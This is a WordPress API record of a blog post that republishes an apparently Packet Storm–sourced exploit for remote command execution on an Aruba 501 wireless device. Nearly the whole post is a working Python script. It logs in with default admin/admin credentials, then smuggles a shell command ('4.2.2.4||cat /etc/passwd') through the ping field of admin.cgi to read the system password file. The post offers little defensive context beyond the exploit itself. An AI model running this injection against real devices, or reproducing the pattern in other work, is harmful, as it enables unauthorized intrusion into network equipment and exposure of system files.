{"id":59169,"date":"2024-08-26T19:29:43","date_gmt":"2024-08-26T16:29:43","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180363\/aruba501-exec.txt"},"modified":"2024-08-26T19:29:43","modified_gmt":"2024-08-26T16:29:43","slug":"aruba-501-cn12g5w0xx-remote-command-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/aruba-501-cn12g5w0xx-remote-command-execution\/","title":{"rendered":"Aruba 501 CN12G5W0XX Remote Command Execution"},"content":{"rendered":"<p># Exploit Title: Remote Command Execution | Aurba 501<br \/># Date: 17-07-2024<br \/># Exploit Author: Hosein Vita<br \/># Vendor Homepage: https:\/\/www.hpe.com<br \/># Version: Aurba 501 CN12G5W0XX<br \/># Tested on: Linux<\/p>\n<p>import requests<br \/>from requests.auth import HTTPBasicAuth<\/p>\n<p>def get_input(prompt, default_value):<br \/>user_input = input(prompt)<br \/>return user_input if user_input else default_value<\/p>\n<p>base_url = input(&#8220;Enter the base URL: &#8220;)<br \/>if not base_url:<br \/>print(&#8220;Base URL is required.&#8221;)<br \/>exit(1)<\/p>\n<p>username = get_input(&#8220;Enter the username (default: admin): &#8220;, &#8220;admin&#8221;)<br \/>password = get_input(&#8220;Enter the password (default: admin): &#8220;, &#8220;admin&#8221;)<\/p>\n<p>login_url = f&#8221;{base_url}\/login.cgi&#8221;<br \/>login_payload = {<br \/>&#8220;username&#8221;: username,<br \/>&#8220;password&#8221;: password,<br \/>&#8220;login&#8221;: &#8220;Login&#8221;<br \/>}<\/p>\n<p>login_headers = {<br \/>&#8220;Accept-Encoding&#8221;: &#8220;gzip, deflate, br&#8221;,<br \/>&#8220;Content-Type&#8221;: &#8220;application\/x-www-form-urlencoded&#8221;,<br \/>&#8220;Origin&#8221;: base_url,<br \/>&#8220;Connection&#8221;: &#8220;close&#8221;<br \/>}<\/p>\n<p>session = requests.Session()<\/p>\n<p>requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)<\/p>\n<p># Login to the system<br \/>response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)<\/p>\n<p># Check if login was successful<br \/>if response.status_code == 200 and &#8220;login failed&#8221; not in response.text.lower():<br \/>print(&#8220;Login successful!&#8221;)<\/p>\n<p># The command to be executed on the device<br \/>command = &#8220;cat \/etc\/passwd&#8221;<\/p>\n<p>ping_ip = f&#8221;4.2.2.4||{command}&#8221;<\/p>\n<p># Data to be sent in the POST request<br \/>data = {<br \/>&#8220;ping_ip&#8221;: ping_ip,<br \/>&#8220;ping_timeout&#8221;: &#8220;1&#8221;,<br \/>&#8220;textareai&#8221;: &#8220;&#8221;,<br \/>&#8220;ping_start&#8221;: &#8220;Ping&#8221;<br \/>}<\/p>\n<p># Headers to be sent with the request<br \/>headers = {<br \/>&#8220;Accept-Encoding&#8221;: &#8220;gzip, deflate, br&#8221;,<br \/>&#8220;Content-Type&#8221;: &#8220;application\/x-www-form-urlencoded&#8221;,<br \/>&#8220;Origin&#8221;: base_url,<br \/>&#8220;Referer&#8221;: f&#8221;{base_url}\/admin.cgi?action=ping&#8221;,<br \/>&#8220;Connection&#8221;: &#8220;close&#8221;<br \/>}<\/p>\n<p># Sending the HTTP POST request to exploit the vulnerability<br \/>exploit_url = f&#8221;{base_url}\/admin.cgi?action=ping&#8221;<br \/>response = session.post(exploit_url, headers=headers, data=data, verify=False)<\/p>\n<p>if any(&#8220;root&#8221; in value for value in response.headers.values()):<br \/>print(&#8220;Exploit successful! The \/etc\/passwd file contents are reflected in the headers:&#8221;)<br \/>print(response.headers)<br \/>else:<br \/>print(&#8220;Exploit failed. The response headers did not contain the expected output.&#8221;)<br \/>else:<br \/>print(&#8220;Login failed. Please check the credentials and try again.&#8221;)<\/p>\n<p># Print the response headers for further analysis<br \/>print(response.headers)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Remote Command Execution | Aurba 501# Date: 17-07-2024# Exploit Author: Hosein Vita# Vendor Homepage: https:\/\/www.hpe.com# Version: Aurba 501 CN12G5W0XX# Tested on: Linux import requestsfrom requests.auth import HTTPBasicAuth def get_input(prompt, default_value):user_input = input(prompt)return user_input if user_input else default_value base_url = input(&#8220;Enter the base URL: &#8220;)if not base_url:print(&#8220;Base URL is required.&#8221;)exit(1) username = get_input(&#8220;Enter &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59169","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59169","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59169"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59169\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59169"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59169"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59169"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}